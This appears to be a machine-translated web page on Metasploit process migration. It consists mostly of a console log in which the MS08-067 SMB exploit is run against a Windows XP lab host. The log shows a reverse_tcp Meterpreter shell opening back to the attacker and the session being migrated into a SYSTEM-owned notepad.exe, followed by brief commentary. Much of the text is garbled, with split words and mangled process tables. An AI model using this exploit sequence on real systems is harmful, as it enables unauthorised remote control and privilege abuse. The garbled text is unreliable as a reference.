Home > Others

Metasploit Migration Process

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more > 
MSF > Use Exploit/windows/smb/ms08_067_netapi MSF Exploit (MS08_067_NETAPI) > Set RHOST 192.168.1.142 RHOST = 19 2.168.1.142 MSF exploit (MS08_067_NETAPI) > Set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD = windows/ Meterpreter/reverse_tcp MSF exploit (MS08_067_NETAPI) > Set lhost 192.168.1.11 lhost = 192.168.1.11 MSF exploit (ms 08_067_NETAPI) > Set target-target-+-MSF exploit (MS08_067_NETAPI) > exploit [*] Started Reverse Handler
On 192.168.1.11:4444 [*] attempting to trigger the vulnerability ... [*] Sending stage (752128 bytes) to 192.168.1.142 [*] Meterpreter Session 2 opened (192.168.1.11:4444-192.168.1.142:1083 ) at 2013-04-27 13:15:56-0400 meterpreter > ps Process List ============ PID PPID Name Arch sess                           Ion User Path--------------------------                          ----0 0 [System Process] 4294967295       
 4 0 System x86 0 NT Authority\System 704 svchost.exe           x86 0 NT Authority\System C:\WINDOWS\System32\svchost.exe 436 704 VMwareService.exe x86 0           NT authority\system C:\Program files\vmware\vmware tools\vmwareservice.exe 564 4 Smss.exe   x86 0 NT Authority\System \systemroot\system32\smss.exe 636 564 Csrss.exe x86 0 NT authority\system \?? \c:\windows\system32\csrss.exe 660 564 Winlogon.exe x86 0 NT authority\system \?? \c:\windows\system32\winlogon.exe 704 660 services.exe x86 0 NT Authority\System C:\WIND Ows\system32\services.exe 716 660 Lsass.exe x86 0 NT Authority\System C:\WINDOWS\syst Em32\lsass.exe 880 704 vmacthlp.exe x86 0 NT Authority\System C:\ProgramFiles\vmware\vmware tools\vmacthlp.exe 924 704 svchost.exe x86 0 NT authority\system C: \windows\system32\svchost.exe 1004 704 Svchost.exe x86 0 NT authority\network SERVICE C:\WINDOWS\ System32\svchost.exe 1124 704 svchost.exe x86 0 NT Authority\System C:\WINDOWS\System32\ Svchost.exe 1212 704 svchost.exe x86 0 NT authority\network SERVICE C:\WINDOWS\system32\svchost.e  Xe 1292 1536 conime.exe x86 0 root-9743dd32e3\administrator C:\WINDOWS\system32\conime.exe 1340 704 Svchost.exe x86 0 NT authority\local SERVICE C:\WINDOWS\system32\svchost.exe 1488 704 SPO        Olsv.exe x86 0 NT authority\system C:\WINDOWS\system32\spoolsv.exe 1596 1536 Explorer.exe           x86 0 root-9743dd32e3\administrator C:\WINDOWS\Explorer.EXE 1672 704 alg.exe x86 0 NT Authority\locAL SERVICE C:\WINDOWS\System32\alg.exe 1700 1596 VMwareTray.exe x86 0 Root-9743dd32e3\administrator C:\Program files\vmware\vmware Tools\vmwaretray.exe 1708 1596 VMwareUser.exe x86 0 Root-9743dd32e3\ad Ministrator C:\Program files\vmware\vmware tools\vmwareuser.exe 1772 1596 ctfmon.exe x86 0 ROOT-97 43dd32e3\administrator C:\WINDOWS\system32\ctfmon.exe 2024 1124 Wscntfy.exe x86 0 root-9743dd32e3\a Dministrator C:\WINDOWS\system32\wscntfy.exe meterpreter > Run post/windows/manage/migrate [*] Running module again St Root-9743dd32e3 [*] Current server Process:svchost.exe (1124) [*] spawning notepad.exe process-to-migrate to [+] Migra               Ting to 1612 [+] successfully migrated to process 1612 Meterpreter > PS process List ============ PID PPID Name                         Arch Session User Path--------------------------  ----0 0 [System Process] 4294967295 4 0 System X            0 NT AUTHORITY\SYSTEM 704 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 436 704 VMwareService.exe x86 0 NT Authority\System C : \program Files\vmware\vmware Tools\vmwareservice.exe 564 4 smss.exe x86 0 NT Authority\syste            M \systemroot\system32\smss.exe 636 564 Csrss.exe x86 0 NT Authority\System \?? \c:\windows\system32\csrss.exe 660 564 Winlogon.exe x86 0 NT authority\system \?? \c:\windows\system32\winlogon.exe 704 660 services.exe x86 0 NT Authority\System C:\WIND Ows\system32\services.exe 716 660 Lsass.exe x86 0 NT Authority\System C:\WINDOWS\syst Em32\lsass.exe 880 704  Vmacthlp.exe x86 0 NT authority\system C:\Program files\vmware\vmware tools\vmacthlp.exe 9   704 Svchost.exe x86 0 NT authority\system C:\WINDOWS\system32\svchost.exe 1004 704 Svchost.exe x86 0 NT authority\network SERVICE C:\WINDOWS\system32\svchost.exe 1124 704 svchost        . exe x86 0 NT authority\system C:\WINDOWS\System32\svchost.exe 1212 704 Svchost.exe   x86 0 NT authority\network SERVICE C:\WINDOWS\system32\svchost.exe 1292 1536 Conime.exe x86           0 root-9743dd32e3\administrator C:\WINDOWS\system32\conime.exe 1340 704 svchost.exe x86 0 NT Authority\Local SERVICE C:\WINDOWS\system32\svchost.exe 1488 704 spoolsv.exe x86 0 NT AUTH Ority\system C:\WINDOWS\system32\spoolsv.exe 1596 1536 explorer.exe x86 0 root-9743dd32e3\ Administrator C:\WINDOWS\explorer.exe 1612 1124 notepad.exe x86 0 NT Authority\System C:\WINDOWS\System32\notepa  D.exe 1672 704 alg.exe x86 0 NT authority\local SERVICE C:\WINDOWS\System32\alg.exe 1700 1596 VMwareTray.exe x86 0 root-9743dd32e3\administrator C:\Program files\vmware\vmware tools\vmwaretray. EXE 1708 1596 VMwareUser.exe x86 0 root-9743dd32e3\administrator C:\Program files\vmware\vmware tools\ VMwareUser.exe 1772 1596 ctfmon.exe x86 0 Root-9743dd32e3\administrator C:\WINDOWS\system32\ctfmon . exe 2024 1124 wscntfy.exe x86 0 root-9743dd32e3\administrator C:\WINDOWS\system32\wscntfy.exe Me  Terpreter >



Before the migration process, the process has not been Notepad.exe and has been migrated. However, XP is only visible through the task Manager.



And by opening Notepad through the administrator, this is the case:




Is the user name is different: System and administrator.


This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
metasploit linux metasploit project metasploit pdf metasploit framework metasploit price metasploit android metasploit video

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More